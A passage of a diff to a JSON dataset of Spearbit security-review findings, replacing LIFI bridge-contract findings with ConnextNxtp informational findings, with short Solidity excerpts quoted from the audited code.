hex\"c5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470\", which is the keccak256 of an empty bytes. We can replace this constant hex literal with a more readable alternative.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Unvalidated destination address in Gravity faucet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Data.destinationAddress address. The code does not validate if the provided destination address is in the valid bech32 format. there is an issue related to the validation of In the Gravity faucet, This can potentially cause issues when sending tokens to the destination address. If the provided address is not in the bech32 format, the tokens can be locked. Also, it can lead to confusion for the end-users as they might enter an invalid address and lose their tokens without any warning or error message. it is recommended to add a validation check for the _gravity-", + "title": "Simplify and add more documentation for getTokenPrice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "getTokenPrice can be simplified and it can try to return early whenever possible.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Hardcode or whitelist the Thorswap vault address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The issue with this code is that the depositWithExpiry function allows the user to enter any arbitrary vault address, which could potentially lead to a loss of tokens. If a user enters an incorrect or non-existent vault address, the tokens could be lost forever. There should be some validation on the vault address to ensure that it is a valid and trusted address before allowing deposits to be made to it. Router 12 // Deposit an asset with a memo. ETH is forwarded, ERC-20 stays in ROUTER function deposit(address payable vault, address asset, uint amount, string memory memo) public payable nonReentrant{ ,! uint safeAmount; if(asset == address(0)){ safeAmount = msg.value; bool success = vault.send(safeAmount); require(success); } else { require(msg.value == 0, \"THORChain_Router: unexpected eth\"); // protect user from ,! accidentally locking up eth if(asset == RUNE) { safeAmount = amount; iRUNE(RUNE).transferTo(address(this), amount); iERC20(RUNE).burn(amount); } else { safeAmount = safeTransferFrom(asset, amount); // Transfer asset _vaultAllowance[vault][asset] += safeAmount; // Credit to chosen vault } } emit Deposit(vault, asset, safeAmount, memo); }", + "title": "Remove unused code, files, interfaces, libraries, contracts, ...", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The codebase includes code, files, interfaces, libraries, and contracts that are no longer in use.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Check enough native assets for fee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function _startBridge() of SquidFacet adds _squidData.fee to _bridgeData.minAmount. It has verified there is enough native asset for _bridgeData.minAmount, but not for _squidData.fee. So this could use native assets present in the Diamond, although there normally shouldn't be any native assets left. A similar issue occurs in: CelerIMFacet DeBridgeFacet function _startBridge(...) ... { ... uint256 msgValue = _squidData.fee; if (LibAsset.isNativeAsset(address(sendingAssetId))) { msgValue += _bridgeData.minAmount; } ... ... squidRouter.bridgeCall{ value: msgValue }(...); ... }", + "title": "_calculateSwapInv and _calculateSwap can mirror each other's calculations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "_calculateSwapInv could have mirrored the implementation of _calculateSwap uint256 y = xp[tokenIndexTo] - (dy * multipliers[tokenIndexTo]); uint256 x = getY(_getAPrecise(self), tokenIndexTo, tokenIndexFrom, y, xp); Or the other way around _calculateSwap mirror _calculateSwapInv and pick whatever is cheaper.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "No check on native assets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The functions startBridgeTokensViaHopL1Native() , startBridgeTokensViaXDaiBridge() and startBridgeTokensViaMultichain() don't check _bridgeData.minAmount <= msg.value. So this could use na- tive assets that are still in the Diamond, although that normally shouldn't happen. This might be an issue in combination with reentrancy. function startBridgeTokensViaHopL1Native(...) ... { _hopData.hopBridge.sendToL2{ value: _bridgeData.minAmount }( ... ); ... } function startBridgeTokensViaXDaiBridge(...) ... { _startBridge(_bridgeData); } function startBridgeTokensViaMultichain(...) ... { if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) LibAsset.depositAsset(_bridgeData.sendingAssetId,_bridgeData.minAmount); } // no check for native assets _startBridge(_bridgeData, _multichainData); }", + "title": "Document that the virtual price of a stable swap pool might not be constant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The virtual price of the LP token is not constant when the amplification coefficient is ramping even when/if token balances stay the same.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Missing doesNotContainDestinationCalls()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The functions startBridgeTokensViaLIFuel() and swapAndStartBridgeTokensViaLIFuel() doesn't have doesNotContainDestinationCalls(). function startBridgeTokensViaLIFuel(...) external payable nonReentrant refundExcessNative(payable(msg.sender)) doesNotContainSourceSwaps(_bridgeData) validateBridgeData(_bridgeData) { ... }", + "title": "Document the reason for picking d is the starting point for calculating getYD using the Newton's method.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "d the stable swap invariant passed to getYD as a parameter and it is used as the starting point of the Newton method to find a root. This root is the value/price for the tokenIndex token that would stabilize the pool so that it would statisfy the stable swap invariant equation.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Race condition in _startBridge of LIFuelFacet.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "If the mapping for FEE_COLLECTOR_NAME hasn't been set up yet, then serviceFeeCollector will be address(0) in function _startBridge of LIFuelFacet. This might give unexpected results. function _startBridge(...) ... ( ... ServiceFeeCollector serviceFeeCollector = ServiceFeeCollector( LibMappings.getPeripheryRegistryMappings().contracts[FEE_COLLECTOR_NAME] ); ... } function getPeripheryContract(string calldata _name) external view returns (address) { return LibMappings.getPeripheryRegistryMappings().contracts[_name]; }", + "title": "Document the max allowed tokens in stable swap pools used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Based on the uint8 type for the indexes of tokens in different stable swap pools, it is inferred that the max possible number of tokens that can exist in a pool is 256. There is the following check when initializing internal pools: if (_pooledTokens.length <= 1 || _pooledTokens.length > 32) revert SwapAdminFacet__initializeSwap_invalidPooledTokens(); This means the internal pools can only have number of pooled tokens in 2, (cid:1) (cid:1) (cid:1) , 32.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Sweep tokens from Hopfacets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The Hop bridges HopFacet and HopFacetOptimized don't check that _bridgeData.sendingAssetId is the same as the bridge token. So this could be used to sweep tokens out of the Diamond contract. Normally there shouldn't be any tokens left at the Diamond, however, in this version there are small amounts left: Etherscan LiFiDiamond.", + "title": "Rename adoptedToLocalPools to better indicate what it represents", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "adoptedToLocalPools is used to keep track of external pools where one can swap between different variations of a token. But one might confuse this mapping as holding internal stable swap pools.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Missing emit in _swapAndCompleteBridgeTokens of Receiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "In function _swapAndCompleteBridgeTokens the catch of ERC20 tokens does an emit, while the comparable catch of native assets doesn't do an emit. function _swapAndCompleteBridgeTokens(...) ... { ... if (LibAsset.isNativeAsset(assetId)) { .. try ... {} catch { receiver.call{ value: amount }(\"\"); // no emit } ... } else { // case 2: ERC20 asset ... try ... {} catch { token.safeTransfer(receiver, amount); emit LiFiTransferRecovered(...); } } }", + "title": "Document the usage of commented mysterious numbers in AppStorage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Before each struct AppStorage's field definition there is a line comment consisting of only digits // xx One would guess they might be relative slot indexes in the storage (relative to AppStorage's slot). But the numbers are not consistent.", "labels": [ - "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "Spearbit", + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Spam events in ServiceFeeCollector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The contract ServiceFeeCollector has several functions that collect fees and are permissionless. This could result in spam events, which might confuse the processing of the events. function collectTokenGasFees(...) ... { ... emit GasFeesCollected(tokenAddress, receiver, feeAmount); } function collectNativeGasFees(...) ... { ... emit GasFeesCollected(LibAsset.NULL_ADDRESS, receiver, feeAmount); } function collectTokenInsuranceFees(...) ... { ... emit InsuranceFeesCollected(tokenAddress, receiver, feeAmount); } function collectNativeInsuranceFees(...) ... { ... emit InsuranceFeesCollected(LibAsset.NULL_ADDRESS,receiver,feeAmount); }", + "title": "RouterPermissionsManagerInfo can be packed differently for readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "RouterPermissionsManagerInfo has multiple fields that are each a mapping of address to a differ- ent value. The address here represents a liquidity router address. It would be more readable to pack these values such that only one mapping is used. This would also indicate how all these mapping have the same shared key which is the router.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Function depositAsset() allows 0 amount of native assets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function depositAsset() disallows amount == 0 for ERC20, however it does allow amount == 0 for native assets. function depositAsset(address assetId, uint256 amount) internal { if (isNativeAsset(assetId)) { if (msg.value < amount) revert InvalidAmount(); } else { if (amount == 0) revert InvalidAmount(); ... } }", + "title": "Consolidate TokenId struct into a file that can be imported in relevant files", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "TokenId struct is defined both in BridgeMessage and LibConnextStorage with the same struc- ture/fields. If in future, one would need to update one struct the other one should also be updated in parallel.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Inadequate expiration time check in ThorSwapFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "According to Thorchain, the expiration time for certain operations should be set to +60 minutes. How- ever, there is currently no check in place to enforce this requirement. This oversight may lead to users inadvertently setting incorrect expiration times, potentially causing unexpected behavior or issues within the ThorSwapFacet.", + "title": "Typos, grammatical and styling errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "There are a few typos and grammatical mistakes that can be corrected in the codebase.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Insufficient validation of bridgedTokenSymbol and sendingAssetId", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "During the code review, It has been noticed that the facet does not adequately check the corre- spondence between the bridgedTokenSymbol and sendingAssetId parameters. This oversight could allow for a random token to be sent to the Diamond, while still bridging another available token within the Diamond, even when no tokens should typically be left in the Diamond.", + "title": "Keep consistent return parameters in calculateSwapToLocalAssetIfNeeded", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "All return paths in calculateSwapToLocalAssetIfNeeded except one return _local as the 2nd return parameter. It would be best for readability and consistency change the following code to follow the same pattern if (_asset == _local) { return (_amount, _asset); }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Check for destinationChainId in CBridgeFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Function _startBridge() of CBridgeFacet contains a check on destinationChainId and contains conversions to uint64. If both block.chainid and _bridgeData.destinationChainId) fit in an uint64 then the checks of modifier val- idateBridgeData are already sufficient. When _bridgeData.destinationChainId > type(uint64).max then this never reverts: if (uint64(block.chainid) == _bridgeData.destinationChainId) revert CannotBridgeToSameNetwork(); Then in the rest of the code it takes the truncated varion of the destinationChainId via uint64(_bridge- Data.destinationChainId), which can be any value, including block.chainid. So you can still bridge to the same chain. function _startBridge(ILiFi.BridgeData memory _bridgeData,CBridgeData memory _cBridgeData) private { if (uint64(block.chainid) == _bridgeData.destinationChainId) revert CannotBridgeToSameNetwork(); if (...) { cBridge.sendNative{ value: _bridgeData.minAmount }(... , ,! uint64(_bridgeData.destinationChainId),...); } else { ... cBridge.send(..., uint64(_bridgeData.destinationChainId), ...); } } modifier validateBridgeData(ILiFi.BridgeData memory _bridgeData) { ... if (_bridgeData.destinationChainId == block.chainid) { revert CannotBridgeToSameNetwork(); } ... }", + "title": "Fix/add or complete missing NatSpec comments.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Some NatSpec comments are either missing or are incomplete.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Absence of nonReentrant in HopFacetOptimized facet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "HopFacetOptimized is a facet-based smart contract implementation that aims to optimize gas usage and streamline the execution of certain functions. It doesn't have the checks that other facets have: nonReentrant refundExcessNative(payable(msg.sender)) containsSourceSwaps(_bridgeData) doesNotContainDestinationCalls(_bridgeData) validateBridgeData(_bridgeData) Most missing checks are done on purpose to save gas. However, the most important check is the nonReentrant modifier. On several places in the Diamond it is possible to trigger a reentrant call, for example via ERC777 18 tokens, custom tokens, native tokens transfers. In combination with the complexity of the code and the power of ERC20Proxy.sol it is difficult to make sure no attacks can occur.", + "title": "Define and use constants for different literals used in the codebase.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Throughout the project, a few literals have been used. It would be best to define a named constant for those. That way it would be more clear the purpose of those values used and also the common literals can be consolidated into one place.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Revert for excessive approvals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Certain tokens, such as UNI and COMP, undergo a reversal if the value input for approval or transfer surpasses uint96. Both aforementioned tokens possess unique logic in their approval process that sets the allowance to the maximum value of uint96 when the approval amount equals uint256(-1). Note: Hop currently doesn't support these token so set to low risk.", + "title": "Enforce using adopted for the returned parameter in swapFromLocalAssetIfNeeded... for consis- tency.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The other return paths in swapFromLocalAssetIfNeeded, swapFromLocalAssetIfNeededForEx- actOut and calculateSwapFromLocalAssetIfNeeded use the adopted parameter as one of the return value com- ponents. It would be best to have all the return paths do the same thing. Note swapFromLocalAssetIfNeeded and calculateSwapFromLocalAssetIfNeeded should always return (_, adopted) and swapFromLocalAssetIfNeededForExactOut should always return (_, _, adopted).", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Inconsistent transaction failure/stuck due to missing validation of global fixed native fee rate and execution fee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The current implementation of the facet logic does not validate the global fixed native fee rate and execution fee, which can lead to inconsistent transaction failures or getting stuck in the process. This issue can arise when the fee rate is not set correctly or there are discrepancies between the fee rate used in the smart contract and the actual fee rate. This can result in transactions getting rejected or stuck, causing inconvenience to users and affecting the overall user experience.", + "title": "Use interface types for parameters instead of casting to the interface type multiple times", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Sometimes casting to the interface type has been performed multiple times. It will be cleaner if the parameter is defined as having that interface and avoid unnecessary casts.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Incorrect value emitted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "LibSwap.swap() emits the following emit AssetSwapped( transactionId, _swap.callTo, _swap.sendingAssetId, _swap.receivingAssetId, _swap.fromAmount, newBalance > initialReceivingAssetBalance // toAmount ? newBalance - initialReceivingAssetBalance : newBalance, block.timestamp ); It will be difficult to interpret the value emitted for toAmount as the observer won't know which of the two values has been emitted.", + "title": "Be aware of tokens with multiple addresses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "If a token has multiple addresses (see weird erc20) then the token cap might have an unexpected effect, especially if the two addresses have a different cap. function _addLiquidityForRouter(...) ... { ... if (s.domain == canonical.domain) { // Sanity check: caps not reached uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); } } ... }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Storage slots derived from hashes are prone to pre-image attacks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Storage slots manually constructed using keccak hash of a string are prone to storage slot collision as the pre-images of these hashes are known. Attackers may find a potential path to those storage slots using the keccak hash function in the codebase and some crafted payload.", + "title": "Remove old references to claims", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The contract RelayerFacet still has some references to claims. These are a residue from a previous version and are not used currently. error RelayerFacet__initiateClaim_emptyClaim(); error RelayerFacet__initiateClaim_notRelayer(bytes32 transferId); event InitiatedClaim(uint32 indexed domain, address indexed recipient, address caller, bytes32[] transferIds); ,! event Claimed(address indexed recipient, uint256 total, bytes32[] transferIds);", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Incorrect arguments compared in SquidFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "startBridgeTokensViaSquid () reverts if (_squidData.sourceCalls.length > 0) != _bridge- Data.hasSourceSwaps. Here, _squidData.sourceCalls is an argument passed to Squid Router, and _bridge- Data.hasSourceSwaps refers to source swaps done by SquidFacet. Ideally, _bridgeData.hasSourceSwaps should be false for this function (though it's not enforced) which means _squidData.sourceCalls.length has to be 0 for it to successfully execute.", + "title": "Doublecheck references to Nomad", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The code refers to nomad several times in a way that is currently not accurate. This could be confusing to the maintainers and readers of the code. This includes the following examples: BridgeFacet.sol:419: * @notice Initiates a cross-chain transfer of funds, calldata, and/or various named properties using the nomad ,! BridgeFacet.sol:423: * assets will be swapped for their local nomad asset counterparts (i.e. bridgeable tokens) via the configured AMM if swap is needed. The local tokens will * necessary. In the event that the adopted assets *are* local nomad assets, no ,! BridgeFacet.sol:424: ,! InboxFacet.sol:87: RoutersFacet.sol:533: AssetLogic.sol:102: asset. ,! AssetLogic.sol:139: swap ,! AssetLogic.sol:185: swap ,! AssetLogic.sol:336: adopted asset ,! AssetLogic.sol:375: * @notice Only accept messages from an Nomad Replica contract. * @param _local - The address of the nomad representation of the asset * @notice Swaps an adopted asset to the local (representation or canonical) nomad * @notice Swaps a local nomad asset for the adopted asset using the stored stable * @notice Swaps a local nomad asset for the adopted asset using the stored stable * @notice Calculate amount of tokens you receive on a local nomad asset for the * @notice Calculate amount of tokens you receive of a local nomad asset for the adopted asset ,! LibConnextStorage.sol:54: * @param receiveLocal - If true, will use the local nomad asset on the destination instead of adopted. ,! LibConnextStorage.sol:148: madUSDC on polygon). ,! LibConnextStorage.sol:204: LibConnextStorage.sol:268: madUSDC on polygon) * @dev Swaps for an adopted asset <> nomad local asset (i.e. POS USDC <> * this domain (the nomad local asset). * @dev Swaps for an adopted asset <> nomad local asset (i.e. POS USDC <> ,! ConnectorManager.sol:11: * @dev Each nomad router contract has a `XappConnectionClient`, which ,! references a 142", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Unsafe casting of bridge amount from uint256 to uint128", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The issue with the code is that it performs an unsafe cast from a uint256 value to a uint128 value in the call to initiateTeleport() function. The _bridgeData.minAmount parameter passed to this function is of type uint256, but it is cast to uint128 without any checks, which may result in a loss of precision or even an overflow. function _startBridge(ILiFi.BridgeData memory _bridgeData) internal { LibAsset.maxApproveERC20( IERC20(dai), address(teleportGateway), _bridgeData.minAmount ); teleportGateway.initiateTeleport( l1Domain, _bridgeData.receiver, uint128(_bridgeData.minAmount) + );", + "title": "Document usage of Nomad domain schema", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The library LibConnextStorage specifies that the domains are compatible with the nomad domain schema. However other locations don't mention this. This is especially important during the enrollment of new domains. * @param originDomain - The originating domain (i.e. where `xcall` is called). Must match nomad domain schema ,! * @param destinationDomain - The final domain (i.e. where `execute` / `reconcile` are called). Must match nomad domain schema ,! struct TransferInfo { uint32 originDomain; uint32 destinationDomain; ... }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Cache s.anyTokenAddresses[_bridgeData.sendingAssetId]", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function _startBridge() of MultichainFacet contains the following expresssion. This retrieves the value for s.anyTokenAddresses[_bridgeData.sendingAssetId] twice. It might save some gas to first store this in a tmp variable. s.anyTokenAddresses[_bridgeData.sendingAssetId] != address(0) ? ,! s.anyTokenAddresses[_bridgeData.sendingAssetId]: ...", + "title": "Router has multiple meanings", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The term router is used for three different concepts. This is confusing for maintainers and readers of the code: A) The router that provides Liquidity and signs bids * `router` - this is the address that will sign bids sent to the sequencer B) The router that can add new routers of type A (B is a role and the address could be a multisig) /// @notice Enum representing address role enum Role { None, Router, Watcher, Admin } C) The router that what previously was BridgeRouter or xApp Router: * @param _router The address of the potential remote xApp Router", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "DeBridgeFacet permit seems unusable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function deBridgeGate.send() takes a parameter permit. This can only be used if it's signed by the Diamond, see DeBridgeGate.sol#L654-L662. As there is no code to let the Diamond sign a permit, this function doesn't seem usable. function _startBridge(...) ... { ... deBridgeGate.send{ value: nativeAssetAmount }(..., _deBridgeData.permit, ...); ... }", + "title": "Robustness of receiving contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In the _reconciled branch of the code, the functions _handleExecuteTransaction(), _execute- Calldata() and excessivelySafeCall() don't revert when the underlying call reverts This seems to be inten- tional. This underlying revert can happen if there is a bug in the underlying call or if insufficient gas is supplied by the relayer. Note: if a delegate address is specified it can retry the call to try and fix temporary issues. The receiving contract already has received the tokens via handleOutgoingAsset() so must be prepared to handle these tokens. This should be explicitly documented. function _handleExecuteTransaction(...) ... { AssetLogic.handleOutgoingAsset(_asset, _args.params.to, _amountOut); _executeCalldata(_transferId, _amountOut, _asset, _reconciled, _args.params); ... } function _executeCalldata(...) ... { if (_reconciled) { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(...); } else { ... } }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Redundant checks in CircleBridgeFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function swapAndStartBridgeTokensViaCircleBridge() contains both noNativeAsset() and onlyAllowSourceToken(). The check noNativeAsset() is not necessary as onlyAllowSourceToken() already verifies the sendingAssetId isn't a native token. 22 function swapAndStartBridgeTokensViaCircleBridge(...) ... { ... noNativeAsset(_bridgeData) onlyAllowSourceToken(_bridgeData, usdc) { ... } modifier noNativeAsset(ILiFi.BridgeData memory _bridgeData) { if (LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { revert NativeAssetNotSupported(); } _; } modifier onlyAllowSourceToken(ILiFi.BridgeData memory _bridgeData, address _token) { if (_bridgeData.sendingAssetId != _token) { revert InvalidSendingToken(); } _; }", + "title": "Functions can be combined", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Both xcall and xcallIntoLocal have same code except receiveLocal (which is set false for xcall and true for xcallIntoLocal) value. Instead of having these as separate function, a single function can be created which can tweak the functionalities of xcall and xcallIntoLocal on basis of receiveLocal value", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Redundant check on _swapData", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "This check is not present in the majority of the facets if (_swapData.length == 0) { revert NoSwapDataProvided(); } Ultimately, it's not required as _depositAndSwap() reverts when length is 0.", + "title": "Document source of zeroHashes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The hashes which are used in function zeroHashes() are not explained, which makes it more difficult to understand and verify the code. function zeroHashes() internal pure returns (bytes32[TREE_DEPTH] memory _zeroes) { ... // keccak256 zero hashes bytes32 internal constant Z_0 = hex\"0000000000000000000000000000000000000000000000000000000000000000\"; ... bytes32 internal constant Z_31 = hex\"8448818bb4ae4562849e949e17ac16e0be16688e156b5cf15e098c627c0056a9\"; ,! ,! }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Duplicate checks done", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "In highlighted cases, a check has been done multiple times at different places: validateBridgeData modifier on ArbitrumBridgeFacet. _startBridge() does checks already done by functions from which it's called. depositAsset() does some checks already done by AmarokFacet.startBridgeTokensViaAmarok().", + "title": "Document underflow/overflows in TypedMemView", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function index() has an overflow when _bytes derflow when _len == 0. These two compensate each other so the end result of index() is as expected. As the special case for _bytes == 0 is also handled, we assume this is intentional. However this behavior isn't mentioned in the comments, while other underflow/overflows are documented. library TypedMemView { function index( bytes29 memView, uint256 _index, uint8 _bytes ) internal pure returns (bytes32 result) { ... unchecked { uint8 bitLength = _bytes * 8; } ... } function leftMask(uint8 _len) private pure returns (uint256 mask) { ... mask := sar( sub(_len, 1), ... ... ) } }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "calldata can be used instead of memory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "When the incoming argument is constant, calldata can be used instead of memory to save gas on copying it to memory. This remains true for individual array elements.", + "title": "Use while loops in dequeueVerified()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Within function dequeueVerified() there are a few for loops that mention a variable as there first element. This is a null statement and can be removed. After removing, only a while condition remains. Replacing the for with a while would make the code more readable. Also (x >= y) can be replaced by (!(x < y)) or (!(y > 